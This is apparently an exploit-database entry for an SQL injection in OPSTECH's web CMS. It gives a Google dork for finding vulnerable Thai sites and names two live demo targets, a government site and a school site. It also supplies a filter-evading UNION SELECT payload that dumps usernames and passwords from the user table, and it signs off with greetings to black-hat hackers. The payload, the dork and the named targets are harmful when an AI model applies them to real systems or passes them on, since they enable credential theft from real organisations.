##############################################################
# Exploit Title: OPSTECH Multi SQL Injection
# Google Dork: intext:Copyright © 2008 by OPSTECH All Right Reserved. site:th & use your brain
# Date: 6.10.2018
# Exploit Author: mr.Gh0st N@0b
# Vendor Homepage: http://www.opstech.co.th/
# Tested on: Window 10
################################################################
# Demo
- http://www.janvan.go.th/index.php?mod=news_page&path=news_page&id_sub=148'&id_type=1
- http://www.mrv.ac.th/index.php?mod=news_page&path=news_page&id_sub=61'&id_type=1
-
# Payload
/*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,group_concat(user,0x3a,pass,0x3c62723e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from cms_main_user-- -
#####################################################
# mr.Gh0st N@0b
# Myanmar Noob Hackers
# Greetz to All Myanmar Black Hats
# https://www.facebook.com/official.myanmar.noob.hackers/
#####################################################